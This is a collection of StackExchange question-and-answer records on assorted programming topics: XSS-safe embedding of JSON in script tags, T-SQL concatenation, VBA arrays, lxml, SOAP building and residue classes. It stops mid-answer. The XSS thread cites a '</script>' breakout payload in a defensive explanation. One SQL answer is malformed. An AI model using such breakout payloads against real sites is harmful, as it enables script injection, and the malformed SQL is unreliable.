JSON_HEX_QUOT|JSON_HEX_TAG|JSON_HEX_AMP|JSON_HEX_APOS); ?>\n<\/code>\n<code>json_encode()<\/code> returns the JSON representation of a value, hence it's\n guaranteed to evaulate to a valid object in your JS code and you can\n just assign it to a variable as shown. But don't omit the additional\n flags. Depending on the context, an attacker could otherwise use\n payloads like <code><\/script><\/code> to break out of the entire script tag.\nComment: Does json_encode escape though?\nComment: @immibis Yes, with the correct flags! (That's why I linked [this answer](https:\/\/security.stackexchange.com\/questions\/110101\/proper-way-to-protect-against-xss-when-output-is-directly-into-js-not-html\/110110#110110) that addresses this aspect.)\nComment: @Matthew how does that help?\nComment: Alternatively, it maybe be useful to use `` tags instead of trying to escape your json.\nComment: `\"}; \/**\/ \n ` works just fine, the entire contents of the script tag are treated as character data instead of html. `alert(json[\"myvalue\"]);` will now popup with ``\nComment: @Matthew An attacker can just terminate the CDATA section.\nComment: That is correct, all you need to do is escape CDATA within your content block (https:\/\/stackoverflow.com\/questions\/223652\/is-there-a-way-to-escape-a-cdata-end-token-in-xml) and that will work for any content that you want to be treated as character content, regardless of the underlying content, be it json, xml, etc.\nComment: @Matthew: cdata? that would only affect xhtml pages, haven't seen any of those in a while...\n","meta":{"source":"security.stackexchange","title":"XSS - double quote and backslash escaping","dup_signals":{}},"subset":"stackexchange"} +{"text":"Google calendar ExtendedProperty filled by user\n\nQuestion: Short question:\nI have a google calendar in which the appointments get entered by a vb.net program. I am using the <code>ExtendedProperty<\/code> to fill a value to a variable. But it would be much easier if the google user could fill this value.\nLong question: I need to know if this appointment needs further action in the accounting software. So if the user would be able to tell in this google appointment: \"Yes, and phone client if order is finished\". Then I would be able to find this appointment and take action.\nI am using the <code>newEvent.Content<\/code>.<code>Content<\/code> variable for this, but this is errorprone as the user needs to fill in: \nYES#And phone client if order is ready#\n<code> Private Function GoogleAgendaAanmaken(ByVal GoogleEmail As String, ByVal GooglePassword As String, _\n ByVal Titel As String, ByVal Omschr As String, ByVal Locatie As String, _\n ByVal StartTijd As DateTime) As String\n\n GoogleAgendaAanmaken = \"\"\n Dim Id As String = Guid.NewGuid().ToString()\n\n Try\n\n Dim serv As CalendarService = GAuthenticate(GoogleEmail, GooglePassword)\n\n Dim newEvent As New Google.GData.Calendar.EventEntry\n newEvent.Title.Text = Titel\n newEvent.Content.Content = Omschr\n\n Dim Waar As New Google.GData.Extensions.Where()\n Waar.ValueString = Locatie\n newEvent.Locations.Add(Waar)\n\n Dim newTime As New Google.GData.Extensions.When()\n newTime.StartTime = StartTijd\n newTime.EndTime = DateAdd(DateInterval.Minute, 30, StartTijd)\n newEvent.Times.Add(newTime)\n\n Dim oExtendedProperty As New ExtendedProperty()\n oExtendedProperty.Name = \"SynchronizationID\"\n oExtendedProperty.Value = Id\n newEvent.ExtensionElements.Add(oExtendedProperty)\n\n Dim oExtendedProperty2 As New ExtendedProperty()\n oExtendedProperty2.Name = \"Unit4Acties\"\n oExtendedProperty2.Value = \"JA\"\n newEvent.ExtensionElements.Add(oExtendedProperty2)\n\n Dim newatom As AtomEntry\n Dim uri As New Uri(\"https:\/\/www.google.com\/calendar\/feeds\/\" & GoogleEmail & \"\/private\/full\")\n newatom = serv.Insert(uri, newEvent)\n GoogleAgendaAanmaken = Id\n\n Catch ex As Exception\n Call MessageBox.Show(ex.Message)\n End Try\n\n Return GoogleAgendaAanmaken\n\nEnd Function\n<\/code>\nI would like to know if it is possible to change the value of \"Unit4Acties\" in Google Calendar itself, by the user?\nThanks in advance,\nBrian \nComment: have you any code? at present, it is very hard\/impossible for anyone to answer this question accurately with only the details you have provided. Remember, we can't see what you have tried, we only can see the details you have posted above!\nAnswer: No, extended properties can only be written to using the API.\nComment: Thank you. I was afraid of this. (I can't click the upvote as I don't have 15 reputations, sorry)\n","meta":{"source":"stackoverflow","title":"Google calendar ExtendedProperty filled by user","dup_signals":{}},"subset":"stackexchange"} +{"text":"Center buttons horizontally of form\n\nQuestion: Can somebody help me to center the buttons horizontally of a form? I don't know how I can give a vbox layout with align center to the button items.\nThe following code is from Sencha Docs.\n<code>Ext.create('Ext.form.Panel', {\ntitle: 'Simple Form',\nbodyPadding: 5,\nwidth: 350,\n\n\/\/ The form will submit an AJAX request to this URL when submitted\nurl: 'save-form.php',\n\n\/\/ Fields will be arranged vertically, stretched to full width\nlayout: 'anchor',\ndefaults: {\n anchor: '100%'\n},\n\n\/\/ The fields\ndefaultType: 'textfield',\nitems: [{\n fieldLabel: 'First Name',\n name: 'first',\n allowBlank: false\n},{\n fieldLabel: 'Last Name',\n name: 'last',\n allowBlank: false\n}],\n\n\/\/ Reset and Submit buttons\nbuttons: [{\n text: 'Reset',\n handler: function() {\n this.up('form').getForm().reset();\n }\n}, {\n text: 'Submit',\n formBind: true, \/\/only enabled once the form is valid\n disabled: true,\n handler: function() {\n var form = this.up('form').getForm();\n if (form.isValid()) {\n form.submit({\n success: function(form, action) {\n Ext.Msg.alert('Success', action.result.msg);\n },\n failure: function(form, action) {\n Ext.Msg.alert('Failed', action.result.msg);\n }\n });\n }\n }\n}],\nrenderTo: Ext.getBody()\n});\n<\/code>\nI thank you very much for your support!\nKind regards, shub\nAnswer: I found the correct solution. You have to set only the \"buttonAlign\" config to center.\n<code>Ext.create('Ext.form.Panel', {\n title: 'Simple Form',\n bodyPadding: 5,\n width: 350,\n\n \/\/ The form will submit an AJAX request to this URL when submitted\n url: 'save-form.php',\n\n \/\/ Fields will be arranged vertically, stretched to full width\n layout: 'anchor',\n defaults: {\n anchor: '100%'\n },\n\n \/\/ The fields\n defaultType: 'textfield',\n items: [{\n fieldLabel: 'First Name',\n name: 'first',\n allowBlank: false\n },{\n fieldLabel: 'Last Name',\n name: 'last',\n allowBlank: false\n }],\n buttonAlign: 'center',\n\n \/\/ Reset and Submit buttons\n buttons: [{\n text: 'Reset',\n handler: function() {\n this.up('form').getForm().reset();\n }\n }, {\n text: 'Submit',\n formBind: true, \/\/only enabled once the form is valid\n disabled: true,\n handler: function() {\n var form = this.up('form').getForm();\n if (form.isValid()) {\n form.submit({\n success: function(form, action) {\n Ext.Msg.alert('Success', action.result.msg);\n },\n failure: function(form, action) {\n Ext.Msg.alert('Failed', action.result.msg);\n }\n });\n }\n }\n }],\n renderTo: Ext.getBody()\n});\n<\/code>\nAnswer: you can use \"bbar\" for this. check this.\n<code> bbar: {\n layout: 'auto',\n items: {\n xtype: 'container',\n autoEl: 'center',\n defaultType: 'button',\n items: [{\n text: 'Reset',\n handler: function() {\n this.up('form').getForm().reset();\n }},\n {\n text: 'Submit',\n formBind: true,\n \/\/only enabled once the form is valid\n disabled: true,\n handler: function() {\n var form = this.up('form').getForm();\n if (form.isValid()) {\n form.submit({\n success: function(form, action) {\n Ext.Msg.alert('Success', action.result.msg);\n },\n failure: function(form, action) {\n Ext.Msg.alert('Failed', action.result.msg);\n }\n });\n }\n }}]\n }\n }\n<\/code>\n","meta":{"source":"stackoverflow","title":"Center buttons horizontally of form","dup_signals":{}},"subset":"stackexchange"} +{"text":"T-SQL How to GROUP BY two fields and concatenate another\n\nQuestion: I'm trying to group on 2 fields and return a third field that is a concatenation of the values of another field that the first 2 have in common, with a given ProductID. Here is my data:\n<code>ProductID Currency Price Territory\n1 USD 6.99 US\n1 EUR 4.99 GR\n1 EUR 4.99 HU\n1 EUR 4.99 LT\n2 USD 7.99 US\n2 EUR 5.99 GR\n2 EUR 5.99 HU\n<\/code>\nI'd like results to come back like this:\n<code>ProductID Currency Price Territories\n1 USD 6.99 US\n1 EUR 6.99 GR, HU, LT\n<\/code>\nI can pull the Currenty and Price columns, but can't concatenate the Territories they have in common:\n<code>SELECT Currency, Price\nFROM TerritoryPricing\nWHERE ProductID = 1\nGROUP BY Currency, Price\n<\/code>\nHow can I concatenate the territories?\nComment: Google: \"SQL Server aggregate string concatenation\"\nComment: look this article http:\/\/stackoverflow.com\/questions\/3368942\/grouped-string-aggregation-listagg-for-sql-server\nComment: http:\/\/sqlperformance.com\/2014\/08\/t-sql-queries\/sql-server-grouped-concatenation\nAnswer: you can use Concat:\n<code>SELECT ProductID, Currency, Price, CONCAT(Territory)\nGROUP BY territory\nFROM employee_tbl;\n<\/code>\nor create a function with colace something like like this\n<code>CREATE FUNCTION [dbo].[terr]\n(\n @territoryID int\n)\nRETURNS varchar(max)\nAS\nBEGIN\n declare @output varchar(max)\n select @output = COALESCE(@output + ', ', '') + territory\n from TerritoryPricing\n where territoryid = @territoryID\n\n return @output\nEND\n\nGO\n\nSELECT UserID, [dbo].terr(territoryID)\nFROM TerritoryPricing\nGROUP BY territory\n\nGO\n<\/code>\nAnswer: Test this code\n<code>DECLARE @S VARCHAR(8000)\nSELECT \n Currency, \n Price , \n Territories = (Select @S = @S + Territory FROM TerritoryPricing as T2 WHERE T1.Currency = T2.Currency AND T1.Price = T2.Price) ,\n Empty = (select @S ='') \nFROM TerritoryPricing as T1\nWHERE ProductID = 1\nGROUP BY Currency, Price\n<\/code>\nAnswer: You can use SQL's XML processing to generate concatenated lists with SQL 2000 and up:\n<code>create table #TerritoryPricing ( ProductID int, Currency varchar(3), Price decimal(10,2), Territory varchar(2))\ninsert into #TerritoryPricing values (1,'USD',6.99,'US')\ninsert into #TerritoryPricing values (1,'EUR',4.99,'GR')\ninsert into #TerritoryPricing values (1,'EUR',4.99,'HU')\ninsert into #TerritoryPricing values (1,'EUR',4.99,'LT')\ninsert into #TerritoryPricing values (2,'USD',7.99,'US')\ninsert into #TerritoryPricing values (2,'EUR',5.99,'GR')\ninsert into #TerritoryPricing values (2,'EUR',5.99,'HU')\n\nSELECT Currency, Price,\n SUBSTRING(\n (SELECT ( ',' + ltrim(rtrim(Territory))) \n FROM #TerritoryPricing t2\n WHERE t1.Currency = t2.Currency \n and t1.Price = t2.Price\n and ProductID = 1\n ORDER BY t2.Territory\n FOR XML PATH('')\n ), 2, 8000) Territories\nFROM #TerritoryPricing t1\nWHERE ProductID = 1\nGROUP BY Currency, Price\n<\/code>\nComment: This is great, thank you. The only thing I had to add was a \"WHERE ProductID = 1\" in the subquery WHERE clause. Thanks!\n","meta":{"source":"stackoverflow","title":"T-SQL How to GROUP BY two fields and concatenate another","dup_signals":{}},"subset":"stackexchange"} +{"text":"How should one refer to the smallest remainders generated by a modulus within DH or DLP?\n\nQuestion: It's my understanding that the integer base and exponents chosen to create the initial public keys in DH are from the remainders of a modulus. \nFor example, if the value of the modulus is $N=11$, a set of remainders \"produced\" is <code>{0,1,2,3,4,5,6,7,8,9,10}<\/code>, however, I could also refer to the remainders of $N$ as <code>11,12,13,14,15,16,17,18,19,20,21<\/code>. \nIs there a way to differentiate by name the remainders <code>{0,1,2,3,4,5,6,7,8,9,10}<\/code>? \nFor example, is it accurate to refer to <code>{0,1,2,3,4,5,6,7,8,9,10}<\/code> as the canonical remainders of $\\pmod N$? If yes, then can I refer to a particular base used as the <code>canonical base<\/code> and the exponent used the <code>canonical exponent<\/code>? Or is there a different terminology for these elements? \nComment: Formally mathematicians consider the elements of $Z_n$ aka $Z\/nZ$ as congruence classes, but you are right we often represent and always(?) implement them using the integers 0..n-1, or 1.. for the multiplicative group, usually without saying so explicitly IME. The base or generator is a group element, but _exponents_ are effectively modulo (less than) the order of g, which is also the order of the subgroup generated by g; for n prime this is at most n-1, but may be less, sometimes substantially less.\nComment: I appreciate the insight and my intent in asking was to clarify and make explicit what seems to always be implicit. IMHO it seems confusing for someone trying to understand the internals of how DH works not to find a more definitive statement of which equivalence class is being used. Also, while I understand the literal meaning of you saying, \"The base or generator is a group element\", but doesn't the base also have to be within the remainder\/equivalence class as well? Finally, forgive my ignorance what does IME stand for :) ?\nComment: I don't know what you're asking by \"within the remainder\/equivalence class\". If we treat the mod-n elements (formally) as classes, then the base\/generator is one of them, i.e. it is a class which is an element of the class of classes. If we treat the mod-n elements as numbers 0..n-1, then the base\/generator is one of them. Either way it is one of the group elements. IME = in my experience.\nAnswer: The space $\\mathbb Z\/n\\mathbb Z$ is usually taken to consist of equivalence classes modulo $n$ called residue classes\u2014equivalence classes of integers under the equivalence relation $a \\sim b$ if and only if $n$ divides $a - b$. For example, $\\mathbb Z\/3\\mathbb Z$ consists of the three equivalence classes\n\\begin{align}\n 3\\mathbb Z &= \\{\\dots, -3, 0, 3, 6, \\dots\\}, \\\\\n 1 + 3\\mathbb Z &= \\{\\dots, -2, 1, 4, 7, \\dots\\}, \\\\\n 2 + 3\\mathbb Z &= \\{\\dots, -1, 2, 5, 8, \\dots\\}.\n\\end{align}\nResidue classes are sometimes also called cosets in group theory.\nAny set of distinct representatives of all the equivalence classes modulo $n$ is called a complete residue system modulo $n$. For example, $\\{0,1,2\\}$ is a complete residue system modulo 3, as is $\\{99,-26,-1\\}$.\nUsually if we want to choose particular representatives for computation, we choose the least nonnegative residues like $\\{0,1,2\\}$, where each number is taken to represent the equivalence class it is an element of.\nThere are also more exciting systems like Montgomery residues in radix $r$, where a coset $a + n\\mathbb Z$ is represented by the integer $a \\cdot r^{-1} \\bmod n$, where $r^{-1}$ is an integer such that $r \\cdot r^{-1} \\equiv 1 \\pmod n$. For instance, in radix 8, modulo 5 we have the representatives\n\\begin{align}\n 0 &\\mapsto 0 + 5\\mathbb Z, \\\\\n 2 &\\mapsto 1 + 5\\mathbb Z, \\\\\n 4 &\\mapsto 2 + 5\\mathbb Z, \\\\\n 1 &\\mapsto 3 + 5\\mathbb Z, \\\\\n 3 &\\mapsto 4 + 5\\mathbb Z.\n\\end{align}\nThis peculiar-looking function has the property that we can compute a representative of its image by $$\\rho(x) = \\bigr(x + n\\cdot[(x \\bmod r) \\cdot n' \\bmod r]\\bigr)\/r,$$ where the only divisor involved in the computation is $r$. Here $n' n \\equiv 1 \\pmod r$, and the result is either the least nonnegative residue modulo $n$, or the next one greater, so you can get the least nonnegative residue with a single conditional subtraction. The form $a \\cdot r^{-1}$ is preserved by addition and subtraction, $(a \\pm b) \\cdot r^{-1} = a \\cdot r^{-1} \\pm b \\cdot r^{-1}$, and while it is not preserved by multiplication, it can be restored by evaluating $\\rho$: $$(a \\cdot b) \\cdot r^{-1} = \\rho\\bigl((a \\cdot r^{-1}) \\cdot (b \\cdot r^{-1})\\bigr).$$ This technique is called Montgomery multiplication. When $r$ is a natural machine word size like $2^{32}$, this representation can be considerably faster without timing side channels than reduction modulo a general odd $n$.\nComment: @poncho oops, fixed\n","meta":{"source":"crypto.stackexchange","title":"How should one refer to the smallest remainders generated by a modulus within DH or DLP?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to associat a model to itself in a Many to Many way using Sails.js\/Waterline?\n\nQuestion: I have a sails.js project and I need a Model to be connected to itself as many to many, is it possible?\nAnswer: Yes(ish)\nYou can create a second model (for the purpose of the association). The second model would reference the same table as the first model and then you just create an association the way you normally would.\n","meta":{"source":"stackoverflow","title":"How to associat a model to itself in a Many to Many way using Sails.js\/Waterline?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set default value on a custom property\n\nQuestion: I have created a longstring custom property that gives me a XHTML editor. So far so good but I need help with two things.\nFirst, I would like to fill the property with a default value. I've looked at a couple of blog post about this but can't seem to get it right.\nSecond, I would want to render the custom property as a regular <code>textbox<\/code> that can hold a large string.\n<code>public class CustomerTypeBoxControl :\n EPiServer.Web.PropertyControls.PropertyLongStringControl\n{\n protected override void SetupEditControls()\n {\n base.SetupEditControls(); \n }\n\n public CustomerTypeBox CustomerTypeBox\n {\n get\n {\n return PropertyData as CustomerTypeBox;\n }\n }\n}\n\n[Serializable]\n[PageDefinitionTypePlugIn]\npublic class CustomerTypeBox : EPiServer.Core.PropertyLongString\n{\n public override IPropertyControl CreatePropertyControl()\n {\n return new CustomerTypeBoxControl();\n }\n}\n<\/code>\nComment: Can you just use a page builder type?\nComment: When you add the property to the page, does it give you the options to disable all the rich editor abilities like bold and italic? If you turn them all off, you simply have a long string editor.\nAnswer: Don't know if it is steel relevant but here is the solution:\n<code>TextBox _textBox;\nprotected override void SetupEditControls()\n{\n base.SetupEditControls();\n\n _textBox = (TextBox)EditControl;\n var value = CustomerTypeBox.Value ?? string.Empty;\n if (String.IsNullOrEmpty(value.ToString()))\n {\n _textBox.Text = \"Default text\";\n }\n else\n {\n _textBox.Text = value.ToString();\n }\n if (_textBox != null) EditControl.Parent.Controls.Add(_textBox);\n}\n\npublic override void ApplyEditChanges()\n{\n var customerTypeBoxValue = _textBox.Text;\n\n if (customerTypeBoxValue != null)\n {\n SetValue(customerTypeBoxValue);\n }\n}\n<\/code>\nDefault value for property is also possible to set in admin mode.\n","meta":{"source":"stackoverflow","title":"Set default value on a custom property","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using lxml to process html from requests. TypeError: can't pickle _ElementUnicodeResult objects\n\nQuestion: I am trying to get data found at a specific xpath on a page. I am able to get to the page via requests. I have verified I am at the correct page by using r.text to print the source code to my screen and comparing the displayed text to the text I am looking for. \nr.text returns a string that is difficult to extract the info I want out of. I have been informed lxml is the way to go in order to search for info by xpath. Unfortunately, I am getting a type error. \n<code>from lxml import html\nimport requests\n\npayload = {'login_pass': 'password', 'login_user': 'username','submit':'go'}\nr = requests.get(\"website\", params=payload)\n\nprint r.encoding\ntree = html.fromstring(r.text)\nprint tree\nprint tree.text_content()\n<\/code>\nreturns\n<code>UTF-8\n<Element html at 0x10dab8d08>\n\nTraceback (most recent call last):\n File \"\/Users\/Me\/Documents\/PYTHON\/GetImageAsPdf\/ImageToPDF_requests_beta.py\", line 11, in <module>\n print tree.text_content()\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/idlelib\/PyShell.py\", line 1343, in write\n return self.shell.write(s, self.tags)\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/idlelib\/rpc.py\", line 595, in __call__\n value = self.sockio.remotecall(self.oid, self.name, args, kwargs)\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/idlelib\/rpc.py\", line 210, in remotecall\n seq = self.asynccall(oid, methodname, args, kwargs)\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/idlelib\/rpc.py\", line 225, in asynccall\n self.putmessage((seq, request))\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/idlelib\/rpc.py\", line 324, in putmessage\n s = pickle.dumps(message)\n File \"\/usr\/local\/Cellar\/python\/2.7.6\/Frameworks\/Python.framework\/Versions\/2.7\/lib\/python2.7\/copy_reg.py\", line 70, in _reduce_ex\n raise TypeError, \"can't pickle %s objects\" % base.__name__\nTypeError: can't pickle _ElementUnicodeResult objects\n<\/code>\nI tried checking the headers\n<code>r.headers\n<\/code>\nreturns \n<code>{'charset': 'utf-8',\n 'x-powered-by': 'PHP\/5.3.3',\n 'transfer-encoding': 'chunked',\n 'set-cookie': 'PHPSESSID=c6i7kph59nl9ocdlkckmjavas1; path=\/, LOGIN_USER=deleted; expires=Tue, 15-Oct-2013 15:12:08 GMT; path=\/',\n 'expires': 'Thu, 19 Nov 1981 08:52:00 GMT',\n 'server': 'Apache\/2.2.15 (CentOS)',\n 'connection': 'close',\n 'pragma': 'no-cache',\n 'cache-control': 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0',\n 'date': 'Wed, 15 Oct 2014 15:12:09 GMT',\n 'content-type': 'text\/html; charset=UTF-8'}\n<\/code>\nMy goal is to be able to search the tree via xpath like this:\n<code>quantity = tree.xpath('\/html\/body\/form[1]\/table[3]\/tbody[1]\/tr\/td[2]\/table\/tbody\/tr\/td[1]\/table\/tbody\/tr\/td\/table[1]\/tbody\/tr[1]\/td[2]\/strong')\n<\/code>\nCan you please help me identify where I am going wrong? \nComment: Where are you running this code from? IDLE?\nComment: It looks like that error is happening because IDLE needs to pickle the contents of the command you're trying to run and send it to another process. If you run this script directly from the CLI, does it work ok?\nComment: yes I am using IDLE. Python 2.7.6. Mac OSx 10.8.5.\n\nI am using the IDLE that came built in with python when installed with homebrew.\nComment: yep. That seems to have done the trick. My goal of using that quantity line is not picking up any data by that xpath, but I suppose that is another issue all together. The tree is no longer returning an error so I am one step closer to success. Thank you.\nAnswer: You should be able to convert the <code>_ElementUnicodeResult<\/code> object into a regular, picklable unicode string.\nWith Python 2, simply wrap it with <code>unicode()<\/code>, e.g. <code>print unicode(tree.text_content())<\/code>\nAnd with Python 3, simply wrap it in <code>str()<\/code>, e.g. <code>str(tree.text_content())<\/code>\n","meta":{"source":"stackoverflow","title":"Using lxml to process html from requests. TypeError: can't pickle _ElementUnicodeResult objects","dup_signals":{}},"subset":"stackexchange"} +{"text":"Replacing GROUP BY by SELECT DISTINCT when not using aggregation function in SELECT\n\nQuestion: As a part of a past university assignment I was given this nested SQL statement:\n<code>SELECT DISTINCT P.playerId\nFROM Player P\nWHERE (\n SELECT COUNT(G.id)\n FROM Game G\n WHERE G.playerId = P.playerId\n) >10\n<\/code>\nThe task was to unnest the query. As preparation for the exams I now tried to solve this task again and came up with a solution similar to this (not 100% sure about the right syntax but I guess the intention is clear):\n<code>SELECT DISTINCT P.playerId\nFROM Player P, Game G\nWHERE G.playerId = P.playerId\nHAVING COUNT(G.id) >10\n<\/code>\nHowever, the official solution suggested this query:\n<code>SELECT P.playerId\nFROM Player P, Game G\nWHERE P.playerId = G.playerId\nGROUP BY P.playerId\nHAVING COUNT(G.id) > 10\n<\/code>\nSo, my question is, whether this would just be an alternative solution or whether it is just not possible to have a <code>SELECT DISTINCT<\/code> without <code>GROUP BY<\/code> when using <code>HAVING + aggregate function<\/code>? Essentially, the result of <code>SELECT DISTINCT<\/code> and <code>GROUP BY<\/code> should be the same but I'm just not sure about leaving out <code>GROUP BY<\/code> when using a <code>HAVING<\/code> clause.\nThanks in advance for any insights on this.\nAnswer: I think the best solution is:\n<code>SELECT G.playerId\nFROM Game G\nGROUP BY G.playerId\nHAVING COUNT(*) > 10;\n<\/code>\nThe <code>JOIN<\/code> is totally unnecessary. And if you do want to join, use <code>JOIN<\/code>, not a comma.\nComment: Ok, that makes sense. However, I guess that, despite a join being unnecessary in this case, the goal of the task was for us to unnest the query by using a join as it was explicitly asked to say why the specific type of join is important to unnest the query.\nComment: Most databases will not accept `HAVING` without a corresponding `GROUP BY`\nComment: @Samaranth . . . Very curious question for a query that only needs one table.\n","meta":{"source":"stackoverflow","title":"Replacing GROUP BY by SELECT DISTINCT when not using aggregation function in SELECT","dup_signals":{}},"subset":"stackexchange"} +{"text":"A list of tuples in VBA?\n\nQuestion: I am trying to basically do the equivalent of this in VBA:\n<code>myArray.apend((field1, field2, field3))\n<\/code>\n(using Python syntax)\nSo something where each element of the array\/list has three elements. Can this be done in VBA?\nComment: You can have arrays within arrays, if that is what you mean. Something like `myArray = Array(Array(field1, field2, field3), Array(...), ..., )`\nComment: I want the ability to add them dynamically, not just statically all in one line\nAnswer: To extend an array, use the <code>ReDim<\/code> statement:\n<code>Sub foo()\n'## Declares your array of len==1\nReDim myArray(0)\nmyArray(0) = Array(\"A\",\"B\",\"C\")\n'## Extends your array:\nReDim Preserve myArray(Ubound(myArray)+1)\nmyArray(Ubound(myArray)) = Array(\"item1\", \"item2\", \"item3\")\n\nEnd Sub\n<\/code>\nOf course, since the item you've added is also an array, you could use the <code>ReDim Preserve<\/code> on the individual array items, as per cyboashu's answer, but this may be somewhat tedious\/redundant. \n<code>Dim chld\ni = UBound(myArray)\n'Get a handle on the child array\nchld = myArray(i)\n'Extend it using ReDim Preserve\nReDim Preserve chld(UBound(chld) + 1)\n'Add another value to the new item:\nchld(UBound(chld)) = \"another value\"\n'Reassign back to the parent array\nmyArray(i) = chld\n<\/code>\nYou could also use the <code>System.Collections.ArrayList<\/code> object:\n<code>Sub f()\n\nDim myArrayList As Object\nDim i As Long\n\nSet myArrayList = ArrayList\n\n'Add ArrayList child objects to the ArrayList object:\nmyArrayList.Add ArrayList\ni = myArrayList.Count - 1\n'Add items to the child ArrayList:\nmyArrayList.Item(i).Add \"A\"\nmyArrayList.Item(i).Add \"B\"\nmyArrayList.Item(i).Add \"C\"\n\n'Add some more:\nmyArrayList.Add ArrayList\ni = myArrayList.Count - 1\nmyArrayList.Item(i).Add 1\nmyArrayList.Item(i).Add 2\nmyArrayList.Item(i).Add 3\n\n'Dump this in to a VBA Array, if needed:\nDim myArray\nmyArray = myArrayList.ToArray()\n\nEnd Sub\nFunction ArrayList()\n Set ArrayList = CreateObject(\"System.Collections.ArrayList\")\nEnd Function\n<\/code>\nScreenshot of the <code>.ToArray<\/code> output in the Locals window:\nAnswer: Jagged Arrays:\nExample:\n<code>Sub jaggedArray()\n\n Dim arrMaster()\n Dim arrChild()\n\n Dim lCtr As Long\n Dim lCtr2 As Long\n\n For lCtr = 1 To 5\n ReDim Preserve arrMaster(1 To lCtr)\n For lCtr2 = 1 To 3\n ReDim Preserve arrChild(1 To lCtr2)\n\n arrChild(lCtr2) = \"Child \" & lCtr2\n\n '\/ Assing array in to array\n arrMaster(lCtr) = arrChild\n\n Next\n Next\n\nEnd Sub\n<\/code>\n","meta":{"source":"stackoverflow","title":"A list of tuples in VBA?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Naming convention using java\n\nQuestion: So I have been building a soap message which takes elements and builds a soap structure. Don't be scared to take a stab at this if your unsure of this content. I'm looking for a changing variable name of some sort. All of the contents bellow are part of a line. Their can be several lines within a xml file so I have decided to loop it in an array, and insert them as an element individually. In the second chunk of code you can see \"CHANGINGVARIABLE\" however I do not know how to avoid this and keep inserting elements based on how many their are without predefining variables. Any tips or help would be greatly appreciated to make this work!\n<code>boolean finished = false; \/\/ true if there is no more item to process \n\nwhile(!finished) {\n String itemNumberz = eElement.getElementsByTagName(\"ItemNumber\").item(cnt).getTextContent();\n String receiptTypez = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n String descriptionz = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n String locationCodez = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n String quantityz = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n String UnitOfMeasurez = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n String UnitCostz = eElement.getElementsByTagName(\"ReceiptType\").item(cnt).getTextContent();\n\n listItemNumbers.add(itemNumberz);\n listReceiptTypes.add(receiptTypez);\n listDescriptions.add(descriptionz);\n listLocationCodes.add(locationCodez);\n listQuantitys.add(quantityz);\n listUnitOfMeasures.add(UnitOfMeasurez);\n listUnitCosts.add(UnitCostz);\n\n ++cnt;\n\n finished = (cnt >= eElement.getElementsByTagName(\"ItemNumber\").getLength());\n \/\/finished = (cnt >= eElement.getElementsByTagName(\"ReceiptType\").getLength());\n System.out.println(cnt);\n}\n\n\/\/ use them :\nint indexYouNeed = 1;\nString itemNumber44 = listItemNumbers.get(indexYouNeed);\n\/\/System.out.println(itemNumber44);\n<\/code>\nBelow is how I am applying them into the soap message.\n<code>while(cnt < 0) {\n String name = (cnt + \"add\");\n int[] CHANGINGVARIABLE = new int[cnt];\n CHANGINGVARIABLE[x] = someValue;\n\n SOAPElement CHANGINGVARIABLE = soapBodyElem7.addChildElement(\"LineItem\");\n\n SOAPElement soapBodyElem9 = CHANGINGVARIABLE.addChildElement(\"ItemNumber\");\n soapBodyElem9.addTextNode(listItemNumbers.get(cnt - 1));\n SOAPElement soapBodyElemaa = CHANGINGVARIABLE.addChildElement(\"ReceiptType\");\n soapBodyElemaa.addTextNode(listReceiptTypes.get(cnt - 1));\n SOAPElement soapBodyElemaaa = CHANGINGVARIABLE.addChildElement(\"Description\");\n soapBodyElemaaa.addTextNode(listDescriptions.get(cnt - 1));\n SOAPElement soapBodyElemaaaa = CHANGINGVARIABLE.addChildElement(\"Quantity\");\n soapBodyElemaaaa.addTextNode(listQuantitys.get(cnt - 1));\n SOAPElement soapBodyElemaaaaa = CHANGINGVARIABLE.addChildElement(\"UnitOfMeasurement\");\n soapBodyElemaaaaa.addTextNode(listUnitOfMeasures.get(cnt - 1));\n SOAPElement soapBodyElemaaaaaa = CHANGINGVARIABLE.addChildElement(\"UnitPrice\");\n soapBodyElemaaaaaa.addTextNode(listUnitCosts.get(cnt - 1));\n SOAPElement soapBodyElemaaaaaaa = CHANGINGVARIABLE.addChildElement(\"LocationCode\");\n soapBodyElemaaaaaaa.addTextNode(listLocationCodes.get(cnt - 1));\n<\/code>\nComment: Please tell me if I understood your problem correctly. You have \"repeating\" lines of code in the second block like: changingVar = soapBodyElem7... changingVar2 = soapBodyElem8... changingVar3 = soapBodyElem9..?\nComment: @MichaelSanchez In order to define a SOAP Element, you have to create a variable. Where I have changing variable, I need different variables for that area. So defined different variables. Now I would easily use predefined variable names, however their may be 10000 lines or 2.\nComment: Not sure if you've solved this already. The code sample is confusing though where CHANGINGVARIABLE is declared as int[] then later as SOAPElement. Have you tried using a SOAPElement array or list?\nComment: @MichaelSanchez Sanchez That I am unsure of how to do. However if this makes a little more sense. The first set of code pulls the content from an xml file. Now the content needs to be stored as an element to make a soap message. However, where Changingvariable is, you can simply define that as v1, v2, v3, however, that is only if their is one line. What if their is 20 lines? the cnt will keep track of that, but how can i make a loop to get this to work for several?\nAnswer: Given your explanation, you can either choose between using a list or an array. Then add new SOAPElements to the list or array by looping.\n<code>**For Array:**\nSOAPElement[] soapArr = new SOAPElement[size];\nfor(int i=0; i < size; i++) {\n soapArr[i] = new SOAPElement();\n}\n\n**For List:**\nList soapList = new LinkedList();\nfor(int i=0; i < size; i++){\n soapList.add(new 